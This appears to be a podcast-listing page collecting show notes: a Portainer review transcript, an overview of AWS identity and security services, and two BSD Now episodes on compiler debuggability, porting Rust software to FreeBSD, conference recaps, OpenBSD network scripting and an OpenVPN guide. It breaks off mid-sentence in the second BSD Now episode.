Website - https://www.portainer.io/Episode TranscriptionWelcome back to the byte. In this episode, we are going to talk about Portainer. Portainer is a user interface for Docker Standalone, Docker Compose, or Docker Swarm. It now runs on Windows 1803 and above, or Linux. So essentially, you can manage Linux workloads, or Windows containers, which is a new feature. This is extremely helpful. We use it for a couple of our projects. I use it also privately for a few of my Swarms that I am running, and it works incredibly well. Very stable has all the features I'm looking for. Let's walk through the different features.Now, to get up and running, it's one Docker run command which launches the dashboard, and the templates, and the manager. Now, every node you want to manage in your Swarm, you have to deploy an agent. It's basically a service task that runs, and you register it back into the dashboard, and then you have visibility of what's going on. Now, in the dashboard, you can actually see Stacks, Services, Volumes, Networks. It's essentially everything we're really interested in when we're managing a Swarm cluster.We can also look at ... We have application templates, and here we have an application. We can say, for example, "Is it a container template? Is it a Swarm stack? Is it a composed stack?" And we can use existing applications, or we can actually create our own stacks, and make it available for our users, which is quite helpful. Think of it as a kickstart for your developers. You can make a Python, with an Nginx, and all the monitoring logging, and all best practices, already baked in. So all your developer has to do is stand it up. Very helpful.You also have the Stacks. And Stacks allows us to manage a Swarm Stack, take control of it. We can update it, we can add more services, et cetera. It's very helpful. We can create and manage Stacks. It's very essential. Let me just going through the interface. You go "Add Stack". It has a web editor. You can actually copy and paste the code right in here, or you can upload YAML, or you can actually grab the YAML file from a Git repository. So, all very helpful ways to deploy a Stack.We can also manage things like Services, Containers, Images, Networks, and Volumes. It really covers all the things we're really interested in. A couple of things I didn't write down was also configs, so we can actually look at the configurations, the secrets. So we can do secret management. And within the Swarm itself, I can actually see a cluster visualizer. And this actually comes from the open-source part of Docker. The Docker example of application app had the cluster visualizer, and that's actually incorporated in-house. So we can see per node, what's running in per node, containers, et cetera.Now, what's quite interesting, and that's quite new, is the user management perspective. Previously, it was all local users. So local users and groups, and now they actually have local users or LDAPs. You can integrate it to your LDAP. And now, which is very new, is now external authentication, to like and OAuth integrator, which is really cool. So you can actually integrate directly with GitHub, GitLab, twitter, et cetera. Whatever your providers are.Now, I find it's extremely easy to manage. I use it for my monitoring demos and etc, because I want to see what's going on. I want to see Images, I want to see Networks. And within Networks, for example, I can go in here, and I can manage Networks. In Services, I can scale Services up and down. And I can actually click on a Container, and I can see, I can stop it, I can kill it, restart it, add additional Containers, and then I can actually see within the Container configurations, I can add commands, entry points ... Everything in the command-line is also here. I can also change the Login driver, restart policies. It has all the features in the command-line, but just visually. So for teams that are not quite familiar with the command-line, or comfortable with the command-line, it's a great place to start because it allows you to understand exactly how are things working?Additionally, it's great for operations teams, because they can see right away, from one user interface, one Swarm, multiple Swarms, how everything's running, and it's quite easy to manage. Like I said, give it a try. Portainer.io. I'm a big user, a fan of this operation. Their business model is on support, so they support how many endpoints, and endpoint like I mentioned before, is actually just an API that's exposed. It's how many APIs are exposed. That's how they're making money at the moment. So have a look. It's open-source. It's really well maintained. They're adding features all the time, and it's a great service. Portainer.io. We'll see you next time. Have a great day.

Develpreneur: Become a Better Developer and Entrepreneur
AWS Compliance, Identity and Security Services (Part 2)

Develpreneur: Become a Better Developer and Entrepreneur

Play Episode Listen Later Nov 5, 2018 24:36


This second part of AWS compliance, identity, and security-related services should feel familiar.  These are solutions that nearly everyone needs, and has used, at some point.  Fortunately, these have free tiers and tutorials to help any user get started with them and building them into your environment in the cloud. Cloud Directory This is an all-important LDAP related service.  The power that the Amazon service brings to this universal need is the ability to integrate and go across multiple directories instead of a single one at a time.  There is a free tier along with some excellent examples to help you get started. Guard Duty This is an attack analytics tool that does not require an installation on your servers.  That alone should be enough to pique your interest if you have ever had to use these applications before.  Although powerful, these applications tend to be a bit of a chore to install and configure.  Guard Duty takes that annoying setup out of the equation and removes all excuses for being proactive with your security Certificate Manager Google has made sure we all care about security certificates.  All web applications that are not secured with a certificate are dinged in search scoring.  Therefore, Amazon provides us with a tool for management of those certificates. Firewall Manager All of the services and servers we are building in Amazon's cloud need to be secured by a firewall.  This alone can mean some administrative headaches.  However, Amazon is nice enough to provide us with this service to make that a non-issue.  The Firewall manager tool is easy to use and applies throughout your system.  Thus, you have one central location to manage all of those security decisions. Secret Manager, HSM, and Key Management Service These services are not much more than the names imply.  They allow you to manage your keys and secrets (authentication credentials) in a single location and link those to the resources you use as they are needed.  This is highly important when you consider the dynamic nature of the resources we use in the cloud and tracking authentication across those. Cognito Your experience includes sites where the authentication is done through Google or Facebook.  This service provides you with a way to easily allow users to register in your directory and manage them.  Note, this is an application level registration and authentication service and not a way for users to be added to your Amazon organization. Inspector When you come to the time of needing to get your site audited for security this service is where you should start.  The Inspector service does an assessment based on best practices and security concerns.  Then it provides you with a report about your application.  Therefore, this service provides you with a list of what is correct and what is not compliant.  Use these results to do the best on your upcoming security audit.  

BSD Now
223: Compile once, debug twice

BSD Now

Play Episode Listen Later Dec 6, 2017 111:35


Picking a compiler for debuggability, how to port Rust apps to FreeBSD, what the point of Docker is on FreeBSD/Solaris, another EuroBSDcon recap, and network manager control in OpenBSD This episode was brought to you by Headlines Compile once, Debug twice: Picking a compiler for debuggability, part 1 of 3 (https://backtrace.io/blog/compile-once-debug-twice-picking-a-compiler-for-debuggability-1of3/) An interesting look into why when you try to debug a crash, you can often find all of the useful information has been ‘optimized out' Have you ever had an assert get triggered only to result in a useless core dump with missing variable information or an invalid callstack? Common factors that go into selecting a C or C++ compiler are: availability, correctness, compilation speed and application performance. A factor that is often neglected is debug information quality, which symbolic debuggers use to reconcile application executable state to the source-code form that is familiar to most software engineers. When production builds of an application fail, the level of access to program state directly impacts the ability for a software engineer to investigate and fix a bug. If a compiler has optimized out a variable or is unable to express to a symbolic debugger how to reconstruct the value of a variable, the engineer's investigation process is significantly impacted. Either the engineer has to attempt to recreate the problem, iterate through speculative fixes or attempt to perform prohibitively expensive debugging, such as reconstructing program state through executable code analysis. Debug information quality is in fact not proportionally related to the quality of the generated executable code and wildly varies from compiler to compiler. Different compilers emit debug information at varying levels of quality and accuracy. However, certain optimizations will certainly impact any debugger's ability to generate accurate stack traces or extract variable values. In the above program, the value of argv is extracted and then the program is paused. The ckprloadptr function performs a read from the region of memory pointed to by argv, in a manner that prevents the compiler from performing optimization on it. This ensures that the memory access occurs and for this reason, the value of argv must be accessible by the time ckprloadptr is executed. When compiled with gcc, the debugger fails to find the value of the variable. The compiler determines that the value of argv is no longer needed after the ckprload_ptr operation and so doesn't bother paying the cost of saving the value. Some optimizations generate executable code whose call stack cannot be sufficiently disambiguated to reconcile a call stack that mirrors that of the source program. Two common culprits for this are tail call optimization and basic block commoning. In another example If the program receives a first argument of 1, then function is called with the argument of "a". If the program receives a first argument of 2, then function is called with the argument of "b". However, if we compile this program with clang, the stack traces in both cases are identical! clang informs the debugger that the function f invoked the function("b") branch where x = 2 even if x = 1. Though some optimizations will certainly impact the accuracy of a symbolic debugger, some compilers simply lack the ability to generate debug information in the presence of certain optimizations. One common optimization is induction variable elimination. A variable that's incremented or decremented by a constant on every iteration of a loop or derived from another variable that follows this pattern, is an induction variable. Coupled with other optimizations, the compiler is then able to generate code that doesn't actually rely on a dedicated counter variable “i” for maintaining the current offset into “buffer”. As you can see, i is completely optimized out. The compiler determines it doesn't have to pay the cost of maintaining the induction variable i. It maintains the pointer in the register %rdi. The code is effectively rewritten to something closer to this: So the for loop, changes into a while loop, with a condition of the end of the input We have shown some common optimizations that may get in the way of the debuggability of your application and demonstrated a disparity in debug information quality across two popular compilers. In the next blog post of this series, we will examine how gcc and clang stack up with regards to debug information quality across a myriad of synthetic applications and real world applications. Looking forward to part 2 *** This is how you can port your rust application to FreeBSD (https://medium.com/@andoriyu/this-is-how-you-can-port-your-rust-application-to-freebsd-7d3e9f1bc3df) This is how you can port your rust application to FreeBSD The FreeBSD Ports Collection is the way almost everyone installs applications (“ports”) on FreeBSD. Like everything else about FreeBSD, it is primarily a volunteer effort. It is important to keep this in mind when reading this document. In FreeBSD, anyone may submit a new port, or volunteer to maintain an existing unmaintained port. No special commit privilege is needed. For this guide I will use fd tool written by David Peter as example project. Prerequisites FreeBSD installation (VM is fine) Local ports tree (done via svn) portlint (located at devel/portlint) poudriere (located at ports-mgmt/poudriere)[optional] Getting ports tree When you install FreeBSD opt-out of the ports tree. Install svn: pkg install svn svn checkout https://svn.freebsd.org/ports/head /usr/ports Poudriere Sometimes you might get asked to show poudriere build log, sometimes you won't. It's good to have anyway. If you choose to use poudriere, use ZFS. There are plenty of guides on the subject. FreeBSD Porter's Handbook is the most complete source of information on porting to FreeBSD. Makefile Whole porting process in most cases is writing one Makefile. I recommend doing something like this. Here is the one I wrote for fd: Port metadata Each port must have one primary category in case of fd it will be sysutils, therefore it's located in /usr/ports/systuils/fd. PORTNAME= fd CATEGORIES= sysutils Since this port conflicts with other util named fd I specified package suffix as: PKGNAMESUFFIX= -find and indicate conflict: CONFLICTS_INSTALL= fd-[0-9]*. That means to install it from packages user will have to type: pkg install fd-find Licenses This section is different for every port, but in case of fd it's pretty straightforward: LICENSE= MIT APACHE20 LICENSE_COMB= dual Since fd includes the text of licenses you should do this as well: LICENSE_FILE_MIT= ${WRKSRC}/LICENSE-MIT LICENSE_FILE_APACHE20= ${WRKSRC}/LICENSE-APACHE Distfiles FreeBSD has a requirement that all ports must allow offline building. That means you have specified which files are needed to be downloaded. Luckily we now have helpers to download GitHub sources directly from GitHub: USE_GITHUB= yes GH_ACCOUNT= sharkdp Since PORTNANE is fd it will try to download sources for sharkdp/fd. By default it's going to download tag: ${DISTVERSIONPREFIX}${DISTVERSION}${DISTVERSIONSUFFIX} fd uses v as the prefix, therefore we need to specify: DISTVERSIONPREFIX= v. It's also possible to specify GH_TAGNAME in case tag name doesn't match that pattern. Extra packages There are very few rust projects that are standalone and use no crates dependencies. It's used to be PITA to make it work offline, but now cargo is a first class citizen in ports: USES= cargo CARGO_CRATES= aho-corasick-0.6.3 atty-0.2.3 # and so goes on Yes, you have to specify each dependency. Luckily, there is a magic awk script that turns Cargo.lock into what you need. Execute make cargo-crates in the port root. This will fail because you're missing checksum for the original source files: make makesum make cargo-crates This will give you what you need. Double check that result is correct. There is a way to ignore checksum error, but I can't remember… Execute make makesum again. CARGO_OUT If. build.rs relies on that you have to change it. fd allows you to use SHELLCOMPLETIONSDIR to specify where completions go, while ripgrep doesn't. In our case we just specify SHELLCOMPLETIONSDIR: SHELL_COMPLETIONS_DIR= ${WRKDIR}/shell-completions-dir CARGO_ENV= SHELL_COMPLETIONS_DIR=${SHELL_COMPLETIONS_DIR} PLIST FreeBSD is very strict about files it's installing and it won't allow you to install random files that get lost. You have to specify which files you're installing. In this case, it's just two: PLIST_FILES= bin/fd man/man1/fd.1.gz Note that sources for fd have uncompressed man file, while here it's listed as compressed. If port installs a lot of files, specify them in pkg-plist like here. To actually install them: post-install: @${STRIP_CMD} ${STAGEDIR}${PREFIX}/bin/fd ${INSTALL_MAN}${WRKSRC}/doc/fd.1 ${STAGEDIR}${MAN1PREFIX}/man/man1 Shell completions clap-rs can generate shell completions for you, it's usually handled by build.rs script. First, we need to define options: OPTIONS_DEFINE= BASH FISH ZSH # list options OPTIONS_DEFAULT= BASH FISH ZSH # select them by default BASH_PLIST_FILES= etc/bash_completion.d/fd.bash-completion FISH_PLIST_FILES= share/fish/completions/fd.fish ZSH_PLIST_FILES= share/zsh/site-functions/_fd To actually install them: post-install-BASH-on: @${MKDIR} ${STAGEDIR}${PREFIX}/etc/bash_completion.d ${INSTALL_DATA} ${SHELL_COMPLETIONS_DIR}/fd.bash-completion ${STAGEDIR}${PREFIX}/etc/bash_completion.d post-install-FISH-on: @${MKDIR} ${STAGEDIR}${PREFIX}/share/fish/completions ${INSTALL_DATA} ${SHELL_COMPLETIONS_DIR}/fd.fish ${STAGEDIR}${PREFIX}/share/fish/completions post-install-ZSH-on: @${MKDIR} ${STAGEDIR}${PREFIX}/share/zsh/site-functions ${INSTALL_DATA} ${SHELL_COMPLETIONS_DIR}/_fd ${STAGEDIR}${PREFIX}/share/zsh/site-functions Bonus round - Patching source code Sometimes you have to patch it and send the patch upstream. Merging it upstream can take awhile, so you can patch it as part of the install process. An easy way to do it: Go to work/ dir Copy file you want to patch and add .orig suffix to it Edit file you want to patch Execute make makepatch in port's root Submitting port First, make sure portlint -AC doesn't give you any errors or warnings. Second, make sure poudriere can build it on both amd64 and i386. If it can't?—?you have to either fix it or mark port broken for that arch. Follow this steps like I did steps. If you have any issues you can always ask your question in freebsd-ports on freenode try to find your answer in porter's handbook before asking. Conference Recap: EuroBSDCon 2017 Recap (https://www.freebsdfoundation.org/blog/conference-recap-eurobsdcon-2017-recap/) The location was wonderful and I loved sneaking out and exploring the city when I could. From what I heard, it was the largest BSD conference in history, with over 320 attendees! Each venue is unique and draws many local BSD enthusiasts, who normally wouldn't be able to travel to a conference. I love having the chance to talk to these people about how they are involved in the projects and what they would like to do. Most of the time, they are asking me questions about how they can get more involved and how we can help. Magical is how I would describe the conference social event. To stand in front of the dinner cruise on the Seine, with the Eiffel Tower standing tall, lit up in the night, while working – talking to our community members, was incredible. But, let me start at the beginning. We attend these conferences to talk to our community members, to find out what they are working on, determine technologies that should be supported in FreeBSD, and what we can do to help and improve FreeBSD. We started the week with a half-day board meeting on Wednesday. BSD conferences give us a chance to not only meet with community members around the world, but to have face-to-face meetings with our team members, who are also located around the world. We worked on refining our strategic direction and goals, determining what upcoming conferences we want FreeBSD presence at and who can give FreeBSD talks and workshops there, discussed current and potential software development projects, and discussed how we can help raise awareness about and increase the use of FreeBSD in Europe. Thursday was the first day of the FreeBSD developer summit, led by our very own Benedict Reuschling. He surprised us all by having us participate in a very clever quiz on France. 45 of us signed into the software, where he'd show the question on the screen and we had a limited amount of time to select our answers, with the results listed on the screen. It was actually a lot of fun, especially since they didn't publicize the names of the people who got the questions wrong. The lucky or most knowledgeable person on France, was des@freebsd.org. Some of our board members ran tutorials in parallel to the summit. Kirk McKusick gave his legendary tutorial, An Introduction to the FreeBSD Open-Source Operating System , George Neville-Neil gave his tutorial, DTrace for Developers, and Benedict Reuschling gave a tutorial on, Managing BSD systems with Ansible. I was pleased to have two chairs from ACM-W Europe run an “Increasing Diversity in the BSDs” BoF for the second year in a row. We broke up into three groups to discuss different gender bias situations, and what we can do to address these types of situations, to make the BSD projects more diverse, welcoming, and inclusive. At the end, people asked that we continue these discussions at future BSD conferences and suggested having an expert in the field give a talk on how to increase the diversity in our projects. As I mentioned earlier, the social dinner was on a boat cruising along the Seine. I had a chance to talk to community members in a more social environment. With the conference being in France, we had a lot of first time attendees from France. I enjoyed talking to many of them, as well as other people I only get to see at the European conferences. Sunday was full of more presentations and conversations. During the closing session, I gave a short talk on the Foundation and the work we are doing. Then, Benedict Reuschling, Board Vice President, came up and gave out recognition awards to four FreeBSD contributors who have made an impact on the Project. News Roundup Playing with the pine64 (https://chown.me/blog/playing-with-the-pine64.html) Daniel Jakots writes in his blog about his experiences with his two pine64 boards: Finding something to install on it 6 weeks ago, I ordered two pine64 units. I didn't (and still don't) have much plan for them, but I wanted to play with some cheap boards. I finally received them this week. Initially I wanted to install some Linux stuff on it, I didn't have much requirement so I thought I would just look what seems to be easy and/or the best supported systemd flavour. I headed over their wiki. Everything seems either not really maintained, done by some random people or both. I am not saying random people do bad things, just that installing some random things from the Internet is not really my cup of tea. I heard about Armbian (https://www.armbian.com/pine64/) but the server flavour seems to be experimental so I got scared of it. And sadly, the whole things looks like to be alot undermanned. So I went for OpenBSD because I know the stuff and who to har^Wkindly ask for help. Spoiler alert, it's boring because it just works. Getting OpenBSD on it I downloaded miniroot62.fs, dd'ed it on the micro SD card. I was afraid I'd need to fiddle with some things like sysutils/dtb because I don't know what I would have needed to do. That's because I don't know what it does and for this precise reason I was wrong and I didn't need to do anything. So just dd the miniroot62.fs and you can go to next checkpoint. I plugged an HDMI cable, ethernet cable and the power, it booted, I could read for 10 seconds but then it got dark. Of course it's because you need a serial console. Of course I didn't have one. I thought about trying to install OpenBSD blindly, I could have probably succeeded with autoinstall buuuuuut… Following some good pieces of advice from OpenBSD people I bought some cp2102 (I didn't try to understand what it was or what were the other possibilities, I just wanted something that would work :D). I looked how to plug the thing. It appears you can plug it on two different places but if you plug it on the Euler bus it could power a bit the board so if you try to reboot it, it would then mess with the power disruption and could lead a unclean reboot. You just need to plug three cables: GND, TXD and RXD. Of course, the TXD goes on the RXD pin from the picture and the RXD goes on the TXD pin. Guess why I'm telling you that! That's it Then you can connect with the usual $ cu -dl /dev/cuaU0 -s 115200 What's the point of Docker on FreeBSD or Solaris? (http://blog.frankleonhardt.com/2017/whats-the-point-of-docker-on-freebsd-or-solaris/) Penguinisters are very keen on their docker, but for the rest of us it may be difficult to see what the fuss is all about – it's only been around a few years and everyone's talking about it. And someone asked again today. What are we missing? Well docker is a solution to a Linux (and Windows) problem that FreeBSD/Solaris doesn't have. Until recently, the Linux kernel only implemented the original user isolation model involving chroot. More recent kernels have had Control Groups added, which are intended to provide isolation for a group of processes (namespaces). This came out of Google, and they've extended to concept to include processor resource allocation as one of the knobs, which could be a good idea for FreeBSD. The scheduler is aware of the JID of the process it's about to schedule, and I might take a look in the forthcoming winter evenings. But I digress. So if isolation (containerisation in Linux terms) is in the Linux kernel, what is Docker bringing to the party? The only thing I can think of is standardisation and an easy user interface (at the expense of having Python installed). You might think of it in similar terms to ezjail – a complex system intended to do something that is otherwise very simple. To make a jail in FreeBSD all you need do is copy the files for your system to a directory. This can even be a whole server's system disk if you like, and jails can run inside jails. You then create a very simple config file, giving the jail a name, the path to your files and an what IP addresses to pass through (if any) and you're done. Just type “service jail nameofjal start”, and off it goes. Is there any advantage in running Docker? Well, in a way, there is. Docker has a repository of system images that you can just install and run, and this is what a lot of people want. They're a bit like virtual appliances, but not mind-numbingly inefficient. You can actually run docker on FreeBSD. A port was done a couple of years ago, but it relies on the 64-bit Linux emulation that started to appear in 10.x. The newer the version of FreeBSD the better. Docker is in ports/sysutils/docker-freebsd. It makes uses of jails instead of Linux cgroups, and requires ZFS rather than UFS for file system isolation. I believe the Linux version uses Union FS but I could be completely wrong on that. The FreeBSD port works with the Docker hub repository, giving you access to thousands of pre-packaged system images to play with. And that's about as far as I've ever tested it. If you want to run the really tricky stuff (like Windows) you probably want full hardware emulation and something like Xen. If you want to deploy or migrate FreeBSD or Solaris systems, just copy a new tarball in to the directory and go. It's a non-problem, so why make it more complicated? Given the increasing frequency Docker turns up in conversations, it's probably worth taking seriously as Linux applications get packaged up in to images for easy access. Jails/Zones may be more efficient, and Docker images are limited to binary, but convenience tends to win in many environments. Network Manager Control for OpenBSD (http://www.vincentdelft.be/post/post_20171023) I propose you a small script allowing you to easily manage your networks connections. This script is integrated within the openbox dynamic menus. Moreover, it allow you to automatically have the connections you have pre-defined based. I was frustrated to not be able to swap quickly from one network interface to an another, to connect simply and quickly to my wifi, to my cable connection, to the wifi of a friend, ... Every time you have to type the ifconfig commands, .... This is nice, but boring. Surely, when you are in a middle of a presentation and you just want a quick connection to your mobile in tethering mode. Thanks to OpenBSD those commands are not so hard, but this frustrate me to not be able to do it with one click. Directly from my windows environment. Since I'm using Openbox, from a menu of openbox. So, I've looked around to see what is currently existing. One tool I've found was netctl (https://github.com/akpoff/netctl). The idea is to have a repository of hostname.if files ready to use for different cases. The idea sounds great, but I had some difficulties to use it. But what annoys me the most, is that it modify the current hostname.if files in /etc. To my eyes, I would avoid to modify those files because they are my working basis. I want to rely on them and make sure that my network will be back to a normal mode after a reboot. Nevertheless, if I've well understood netctl, you have a feature where it will look for the predefined network config matching the environment where you are. Very cool. So, after having played with netctl, look for alternative on internet, I've decided to create nmctl. A small python script which just perform the mandatory network commands. 1. nmctl: a Network Manager Control tool for OpenBSD Nmctl a small tool that allow you to manage your network connections. Why python ? Just because it's the easiest programming language for me. But I should maybe rewrite it in shell, more standard in the OpenBSD world than python. 1.1. download and install I've put nmctl on my sourceforge account here (https://sourceforge.net/p/nmctl/code/ci/master/tree/) You can dowload the last version here (https://sourceforge.net/p/nmctl/code/ci/master/tarball) To install you just have to run: make install (as root) The per-requists are: - having python2.7 installed - Since nmctl must be run as root, I strongly recommend you to run it via doas (http://man.openbsd.org/doas.conf.5). 1.2. The config file First you have to create a config and store it in /etc/nmctl.conf. This file must respect few rules: Each block must starts with a line having the following format: ''':''' Each following lines must start by at least one space. Those lines have more or less the same format as for hostname.if. You have to create a block with the name "open". This will be used to establish a connection to the Open Wifi around you (in restaurant for example) The order of those elements is important. In case you use the -restart option, nmctl will try each of those network configs one after one until it can ping www.google.com. (if you wan to ping something else, you can change it in the python script if you want). You can use external commands. Just preced them with the "!". You have macors. Macros allow you to perform some actions. The 2 currently implemented are '''''' and ''''''. You can use keywords. Currently the only one implemented is "dhcp" Basically you can put all commands that nmctl will apply to the interface to which those commands are referring to. So, you will always have "ifconfig ". Check the manpage of ifconfig to see how flexible command is. You have currently 2 macros: - which refers to the "nwid " when you select an Open Wifi with the -open option of nmctl. - is a macro generating a random mac address. This is useful test a dhcp server for example. The keyword "dhcp" will trigger a command like "dhclient ". 1.3. Config file sample. Let me show you one nmctl.conf example. It speaks by itself. ``` # the name open is required for Open wifi. # this is the interface that nmctl will take to establish a connection # We must put the macro . This is where nmctl will put the nwid command # and the selected openwifi selected by the parameter --open open:iwn0 !route flush -wpa dhcp cable:em0 !route flush dhcp lgg4:iwn0 !route flush nwid LGG4s_8114 wpakey aanotherpassword dhcp home:iwn0 !route flush nwid Linksys19594 wpakey apassword dhcp college:iwn0 !route flush nwid john wpakey haahaaaguessme dhcp cable_fixip:em0 !route flush inet 192.168.3.3 netmask 255.255.255.0 !route add -host default 192.168.3.1 # with this network interface I'm using the macro # which will do what you guess it will do :-) cable_random:em0 !route flush lladdr dhcp ``` In this config we have several cable's networks associated with my interface "em0" and several wifi networks associated with my wireless interface "iwn0". You see that you can switch from dhcp, to fixed IP and even you can play with the random mac address macro. Thanks to the network called "open", you can connect to any open wifi system. To do that, just type ''' nmctl --open ''' So, now, with just one command you can switch from one network configuration to an another one. That's become cool :-). 2. Integration with openbox Thanks to the dynamic menu feature of oenbox[sic], you can have your different pre-defined networks under one click of your mouse. For that, you just have to add, at the most appropriate place for you, the following code in your ./config/openbox/menu.xml In this case, you see the different networks as defined in the config file just above. 3. Automatically identify your available connection and connect to it in one go But the most interesting part, is coming from a loop through all of your defined networks. This loop is reachable via the -restart option. Basically the idea is to loop from the first network config to the last and test a ping for each of them. Once the ping works, we break the loop and keep this setting. Thus where ever you are, you just have to initiate a nmctl -restart and you will be connected to the network you have defined for this place. There is one small exception, the open-wifis. We do not include them in this loop exercise. Thus the way you define your config file is important. Since the network called "open" is dedicated to "open wifi", it will not be part of this scan exercise. I propose you keep it at the first place. Then, in my case, if my mobile, called lgg4, is open and visible by my laptop, I will connect it immediately. Second, I check if my "home wifi" is visible. Third, if I have a cable connected on my laptop, I'm using this connection and do a dhcp command. Then, I check to see if my laptop is not viewing the "college" wifi. ? and so on until a ping command works. If you do not have a cable in your laptop and if none of your pre-defined wifi connections are visible, the scan will stop. 3.1 examples No cable connected, no pre-defined wifi around me: t420:~$ time doas nmctl -r nwids around you: bbox2-d954 0m02.97s real 0m00.08s user 0m00.11s system t420:~$ t420:~$ I'm at home and my wifi router is running: ``` t420:~$ time doas nmctl -r nwids around you: Linksys19594 bbox2-d954 ifconfig em0 down: 0 default fw done fw 00:22:4d:ac:30:fd done nas link#2 done route flush: 0 ifconfig iwn0 nwid Linksys19594 ...: 0 iwn0: no link ........... sleeping dhclient iwn0: 0 Done. PING www.google.com (216.58.212.164): 56 data bytes 64 bytes from 216.58.212.164: icmp_seq=0 ttl=52 time=12.758 ms --- www.google.com ping statistics --- 1 packets transmitted, 1 packets received, 0.0% packet loss round-trip min/avg/max/std-dev = 12.758/12.758/12.758/0.000 ms ping -c1 -w2 www.google.com: 0 0m22.49s real 0m00.08s user 0m00.11s system t420:~$ ``` I'm at home but tethering is active on my mobile: ``` t420:~$ t420:~$ time doas nmctl -r nwids around you: Linksys19594 bbox2-d954 LGG4s8114 ifconfig em0 down: 0 default fw done fw 00:22:4d:ac:30:fd done nas link#2 done route flush: 0 ifconfig iwn0 nwid LGG4s8114 ...: 0 iwn0: DHCPDISCOVER - interval 1 iwn0: DHCPDISCOVER - interval 2 iwn0: DHCPOFFER from 192.168.43.1 (a0:91:69:be:10:49) iwn0: DHCPREQUEST to 255.255.255.255 iwn0: DHCPACK from 192.168.43.1 (a0:91:69:be:10:49) iwn0: bound to 192.168.43.214 -- renewal in 1800 seconds dhclient iwn0: 0 Done. ping: Warning: www.google.com has multiple addresses; using 173.194.69.99 PING www.google.com (173.194.69.99): 56 data bytes 64 bytes from 173.194.69.99: icmp_seq=0 ttl=43 time=42.863 ms --- www.google.com ping statistics --- 1 packets transmitted, 1 packets received, 0.0% packet loss round-trip min/avg/max/std-dev = 42.863/42.863/42.863/0.000 ms ping -c1 -w2 www.google.com: 0 0m13.78s real 0m00.08s user 0m00.13s system t420:~$ ``` Same situation, but I cut the tethering just after the scan. Thus the dhcp command will not succeed. We see that, after timeouts, nmctl see that the ping is failing (return code 1), thus he pass to the next possible pre-defined network. ``` t420:~$ time doas nmctl -r nwids around you: Linksys19594 bbox2-d954 LGG4s8114 ifconfig em0 down: 0 default 192.168.43.1 done 192.168.43.1 a0:91:69:be:10:49 done route flush: 0 ifconfig iwn0 nwid LGG4s8114 ...: 0 iwn0: no link ........... sleeping dhclient iwn0: 0 Done. ping: no address associated with name ping -c1 -w2 www.google.com: 1 ifconfig em0 down: 0 192.168.43.1 link#2 done route flush: 0 ifconfig iwn0 nwid Linksys19594 ...: 0 iwn0: DHCPREQUEST to 255.255.255.255 iwn0: DHCPACK from 192.168.3.1 (00:22:4d:ac:30:fd) iwn0: bound to 192.168.3.16 -- renewal in 302400 seconds dhclient iwn0: 0 Done. PING www.google.com (216.58.212.164): 56 data bytes 64 bytes from 216.58.212.164: icmp_seq=0 ttl=52 time=12.654 ms --- www.google.com ping statistics --- 1 packets transmitted, 1 packets received, 0.0% packet loss round-trip min/avg/max/std-dev = 12.654/12.654/12.654/0.000 ms ping -c1 -w2 www.google.com: 0 3m34.85s real 0m00.17s user 0m00.20s system t420:~$ ``` OpenVPN Setup Guide for FreeBSD (https://www.c0ffee.net/blog/openvpn-guide) OpenVPN Setup Guide Browse securely from anywhere using a personal VPN with OpenVPN, LDAP, FreeBSD, and PF. A VPN allows you to securely extend a private network over the internet via tunneling protocols and traffic encryption. For most people, a VPN offers two primary features: (1) the ability to access services on your local network over the internet, and (2) secure internet connectivity over an untrusted network. In this guide, I'll describe how to set up a personal VPN using OpenVPN on FreeBSD. The configuration can use both SSL certificates and LDAP credentials for authentication. We'll also be using the PF firewall to NAT traffic from our VPN out to the internet. One important note about running your own VPN: since you are most likely hosting your server using a VPS or hosting provider, with a public IP address allocated specifically to you, your VPN will not give you any extra anonymity on the internet. If anything, you'll be making yourself more of a target, since all your activity can be trivially traced back to your server's IP address. So while your VPN will protect you from a snooping hacker on the free WiFi at Starbucks, it won't protect you from a federal investigation. This guide assumes you are running FreeBSD with the PF firewall. If you're using a different Unix flavor, I'll probably get you most of the way there—but you'll be on your own when configuring your firewall and networking. Finally, I've used example.com and a non-routable public IP address for all the examples in this guide. You'll need to replace them with your own domain name and public IP address. Beastie Bits BSDCan 2017 videos (https://www.youtube.com/channel/UCuQhwHMJ0yK2zlfyRr1XZ_Q/feed) Getting started with OpenBSD device driver development PDF (https://www.openbsd.org/papers/eurobsdcon2017-device-drivers.pdf) AWS CloudWatch Logs agent for FreeBSD (https://macfoo.wordpress.com/2017/10/27/aws-cloudwatch-logs-agent-for-freebsd/) FreeBSD Foundation November 2017 Development Projects Update (https://www.freebsdfoundation.org/blog/november-2017-development-projects-update/) Schedule for the BSD Devroom at FOSDEM 2018 (https://fosdem.org/2018/schedule/track/bsd/) *** Feedback/Questions Matt - The show and Cantrill (http://dpaste.com/35VNXR5#wrap) Paulo - FreeBSD Question (http://dpaste.com/17E9Z2W#wrap) Steven - Virtualization under FreeBSD (http://dpaste.com/1N6F0TC#wrap) ***

BSD Now
216: Software is storytelling

BSD Now

Play Episode Listen Later Oct 18, 2017 109:21


EuroBSDcon trip report, how to secure OpenBSD's LDAP server, ZFS channel programs in FreeBSD HEAD and why software is storytelling. This episode was brought to you by Headlines EuroBSDcon Trip Report This is from Frank Moore, who has been supplying us with collections of links for the show and who we met at EuroBSDcon in Paris for the first time. Here is his trip report. My attendance at the EuroBSDCon 2017 conference in Paris was sprinkled with several 'firsts'. My first visit to Paris, my first time travelling on a EuroTunnel Shuttle train and my first time at any BSD conference. Hopefully, none of these will turn out to be 'lasts'. I arrived on the Wednesday afternoon before the conference started on Thursday morning. My hotel was conveniently located close to the conference centre in Paris' 3rd arrondissement. This area is well-known as a buzzy enclave of hip cafes, eateries, independent shops, markets, modern galleries and museums. It certainly lived up to its reputation. Even better, the weather held over the course of the conference, only raining once, with the rest of the time being both warm and sunny. The first two days were taken up with attending Dr Kirk McKusick's excellent tutorial 'An Introduction to the FreeBSD Open-Source Operating System'. This is training "straight from the horse's mouth". Kirk has worked extensively on The FreeBSD operating system since the 1980's, helping to design the original BSD filesystem (FFS) and later working on UFS as well. Not only is Kirk an engaging speaker, making what could be a dry topic very interesting, he also sprinkles liberal doses of history and war stories throughout his lectures. Want to know why a protocol was designed the way that it was? Or why a system flag has a particular value or position in a record? Kirk was there and has the first-hand answer. He reminisces about his meetings and work with other Unix and BSD luminaries and debunks and confirms common myths in equal measure. Kirk's teaching style and knowledge are impressive. Every section starts with an overview and a big picture diagram before drilling down into the nitty-gritty detail. Nothing feels superfluous, and everything fits together logically. It's easy to tell that the material and its delivery have been honed over many years, but without feeling stale. Topics covered included the kernel, processes, virtual memory, threads, I/O, devices, FFS, ZFS, and networking. The slides were just as impressive, with additional notes written by 